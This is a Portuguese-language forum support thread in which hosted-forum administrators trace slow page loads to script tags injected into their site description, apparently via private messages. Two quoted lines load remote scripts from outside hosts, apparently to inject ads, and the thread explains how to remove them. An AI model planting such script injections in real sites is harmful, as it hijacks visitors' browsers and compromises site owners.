Carregamento lento
+4
Sennior
empoleonmega1
Konai
Aru!
8 participantes
Fórum dos Fóruns :: Ajuda e atendimento ao utilizador :: Problemas de conexão :: Questões resolvidas sobre problemas de conexão
Página 1 de 1
Carregamento lento
Detalhes da dúvida
Versão do fórum : phpBB3
Nível de acesso : Administrador
Navegador usado : Mozilla Firefox
Membros afetados : Todos os membros do fórum
Problema começou : Semana passada
Endereço do fórum : zapping.forumais.com
Descrição do problema
Boa noite,Estou com problemas no carregamento de páginas do meu Fórum. Demora quase um minuto a abrir cada página.
Não fiz qualquer alteração de código nem nada.
Podem ajudar-me?
Re: Carregamento lento
Saudações!
Primeiramente:
Em relação ao teu problema, vários outros(as) administradores(as) estão enfrentando o mesmo problema. Suponho eu que tenha sido após a manutenção nos servidores Forumeiros no dia 26/02. Peço a senhorita seja paciente e aguarde!
Se começou recentemente, não há dúvidas que esteja relacionado à isto, mas caso já tenha começado antes, tente limpar o cachê, utilizar o antivírus no seu computador e desabilitar o gerenciamento de códigos JavaScript no CPainel do teu fórum, caso houver.
Até!
Primeiramente:
|
Em relação ao teu problema, vários outros(as) administradores(as) estão enfrentando o mesmo problema. Suponho eu que tenha sido após a manutenção nos servidores Forumeiros no dia 26/02. Peço a senhorita seja paciente e aguarde!
Se começou recentemente, não há dúvidas que esteja relacionado à isto, mas caso já tenha começado antes, tente limpar o cachê, utilizar o antivírus no seu computador e desabilitar o gerenciamento de códigos JavaScript no CPainel do teu fórum, caso houver.
Até!
Sinto que o senhor engraçadinho que estava implantando scripts via MP atacou novamente... aconteceu com o meu fórum e fui verificar o código fonte do seu e está igual.
Aparentemente a MP adiciona esse código extra na descrição do fórum, você perde a vida procurando de onde ele veio e ele estava debaixo do nariz.
No caso do seu está para um link aparentemente offline, já no meu estava o seguinte:
Que aparentemente foi feito pra injetar propagandas.
- Código:
<meta name="description" content="Sintonize-se. . . e discuta televisão! <script src=//xmlfeed2.6te.net/s></script>">
Aparentemente a MP adiciona esse código extra na descrição do fórum, você perde a vida procurando de onde ele veio e ele estava debaixo do nariz.
No caso do seu está para um link aparentemente offline, já no meu estava o seguinte:
- Código:
<script src=//swff.byethost4.com/l></script>
Que aparentemente foi feito pra injetar propagandas.
Sim o senhor esta certo caro @empoleonmega1!
Autor, pelas informações passadas pelo nosso amigo, o código parece estar na descrição de teu fórum. Por gentileza, poderia ir em:
Painel de Controle Geral Fórum Configuração
No campo Descrição do Site apague tudo que estiver lá por gentileza.
Até mais.
Autor, pelas informações passadas pelo nosso amigo, o código parece estar na descrição de teu fórum. Por gentileza, poderia ir em:
Painel de Controle Geral Fórum Configuração
No campo Descrição do Site apague tudo que estiver lá por gentileza.
Até mais.
Tive exatamente o mesmo problema e a solução foi a mesma. foi um ataque hacker isso então.
Tivemos este mesmo problema em nosso fórum e seguindo os passos acima foi resolvido, valeu pelas dicas!
Também estava com o mesmo problema, eu utilizo código de banner do portal se alternar a cada vez que atualiza a página, e tinha informações a mais, deletei e resolveu.
Abraços!!!
Abraços!!!
Agora o problema é aqui no Fórum dos Fóruns: Estou tentando criar um novo tópico com uma dúvida aqui no fórum e não está sendo possível. Preencho todos os campos e informações pedidas e quando vou criar o tópico fica só um retângulo com a mensagem CARRREGANDO e não sai disto, não cria-se nunca este novo tópico. Tentei tanto no Google Chrome quanto no Firefox e no Opera e está com este mesmo erro. E já tem vários minutos que está nesta mensagem e não cria o tópico. Como fazer neste caso?
Saudações Antonio Vieira Sobrinho!
Já tentou esvaziar o cachê do teu navegador?
Até!
Já tentou esvaziar o cachê do teu navegador?
Até!
Acabei de limpar o cachê e limpar completamente o navegador e continua com o mesmo problema, creio que o problema esteja realmente aqui no Fórum dos Fóruns
Querido,Antonio Vieira Sobrinho escreveu:Valeu, Hakuouki. Obrigado!
Isto está ocorrendo, pois foi permitido pela administração a criação. Em breve arrumaremos isto!
Tópico movido de "Outras questões" para "Problemas de conexão"
Até!
Forum lento, parado
Detalhes da dúvida
Versão do fórum : phpBB2
Nível de acesso : Administrador
Navegador usado : Mozilla Firefox, Google Chrome, Internet Explorer, Opera, Safari
Membros afetados : Todos os membros do fórum
Problema começou : Está muito lento, por vezes parado, faz 2 dias
Endereço do fórum : http://www.peixefauna.com/
Descrição do problema
Bom dia, meu forum faz dois dias que está super lento. Entro aparece apenas o logo e a página em branco, passado uns 20, 30 segundos abre totalmente, entro num subforum, aparece o logotipo e página em branco, aguardo 20 segundos e aparece tudo de repente, depois tento criar um tópico, acontece o mesmo e sempre assim. Eu li algures que houve actualização do servidor, meu forum não foi mexido por nós à muito tempo, não alteramos nada, peço a vossa ajuda, pois está impossível qualquer usuário fazer qualquer coisa. Desde já agradeço a ajuda que seja possível.Re: Carregamento lento
Saudações!
Primeiramente:
Visto que temos outra questão pendente com o mesmo problema em questão, estarei fundindo o seu tópico com este: Carregamento lento
Peço atenção nas seguintes mensagens: Hakuouki
Sennior
Tópico fundido
Atenciosamente,
Hakuouki
Primeiramente:
|
Visto que temos outra questão pendente com o mesmo problema em questão, estarei fundindo o seu tópico com este: Carregamento lento
Peço atenção nas seguintes mensagens: Hakuouki
Sennior
Tópico fundido
Atenciosamente,
Hakuouki
Questão marcada como Resolvida ou o Autor solicitou que ela fosse arquivada. Tópico marcado como Resolvido e movido para Questões resolvidas. |